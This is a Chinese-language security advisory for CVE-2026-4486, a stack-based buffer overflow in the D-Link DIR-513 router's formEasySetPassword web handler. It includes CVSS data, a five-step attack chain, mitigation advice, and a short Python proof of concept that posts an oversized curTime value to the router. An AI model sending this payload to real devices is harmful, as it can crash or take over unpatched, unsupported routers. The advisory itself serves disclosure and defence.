CVE-2026-4486 CVSS 8.8 高危

CVE-2026-4486 D-Link DIR-513 栈溢出漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4486

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-513

漏洞概述

D-Link DIR-513路由器1.10版本存在高危栈溢出漏洞。问题出在Web服务模块的/goform/formEasySetPassword接口中的formEasySetPassword函数。攻击者通过恶意构造curTime参数，可触发基于栈的缓冲区溢出。由于该漏洞允许远程利用且利用代码已公开，对不再受官方支持的老旧设备构成严重安全威胁，建议用户尽快更换设备或采取隔离措施。

技术细节

该漏洞存在于D-Link DIR-513设备的Web服务组件中，具体涉及处理表单请求的/goform/formEasySetPassword接口。在formEasySetPassword函数处理用户输入时，未对'curTime'参数进行有效的边界检查。攻击者可以通过发送特制的HTTP POST请求，其中包含超长的'curTime'参数值，触发基于栈的缓冲区溢出。根据CVSS 3.1评分向量（AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H），利用该漏洞无需用户交互，且攻击复杂度低，成功利用可能导致设备完全被控制（机密性、完整性、可用性均受影响）。鉴于该产品已达到生命周期终点（EOL），官方修复的可能性极低，公开的PoC代码增加了被大规模利用的风险。

攻击链分析

STEP 1

1. 侦察

攻击者识别网络中暴露的D-Link DIR-513设备，特别是固件版本为1.10的目标。

STEP 2

2. 构造攻击载荷

攻击者编写脚本，生成包含超长字符串（如1000个'A'）的'curTime'参数数据。

STEP 3

3. 发送恶意请求

攻击者向目标设备的/goform/formEasySetPassword接口发送POST请求，传递恶意的curTime参数。

STEP 4

4. 触发溢出

设备Web服务处理该请求时，由于缺乏边界检查，导致栈缓冲区溢出，覆盖返回地址。

STEP 5

5. 获取控制

攻击者劫持控制流，可能导致设备崩溃（DoS）或执行任意代码（RCE），完全控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    url = f"http://{target_ip}/goform/formEasySetPassword"
    # The vulnerable parameter is 'curTime'.
    # Sending a large payload triggers the stack-based buffer overflow.
    payload = {
        "curTime": "A" * 1000
    }
    
    try:
        print(f"[+] Sending payload to {target_ip}...")
        response = requests.post(url, data=payload, timeout=5)
        print(f"[+] Request sent. Status code: {response.status_code}")
        print("[+] Check the device for a crash or shell.")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    exploit(target)

影响范围

D-Link DIR-513 1.10

防御指南

临时缓解措施

鉴于D-Link DIR-513已不再受厂商支持，无法获取官方补丁修复此漏洞。作为临时缓解措施，用户应确保该设备不直接暴露在互联网上，并通过ACL（访问控制列表）严格限制对管理端口的访问。最安全的做法是更换为仍在维护周期内的现代网络设备。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4486
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4486
3 Details https://www.cvedetails.com/cve/CVE-2026-4486/
4 VulDB https://vuldb.com/cve/CVE-2026-4486
5 Link https://github.com/InfiniteLin/Lin-s-CVEdb/blob/main/DIR-513/formEasySetPassword/formEasySetPassword.md
6 Link https://github.com/InfiniteLin/Lin-s-CVEdb/blob/main/DIR-513/formEasySetPassword/poc.py
7 Link https://vuldb.com/?ctiid.352009
8 Link https://vuldb.com/?id.352009
9 Link https://vuldb.com/?submit.773537
10 Link https://vuldb.com/?submit.773566
11 Link https://www.dlink.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表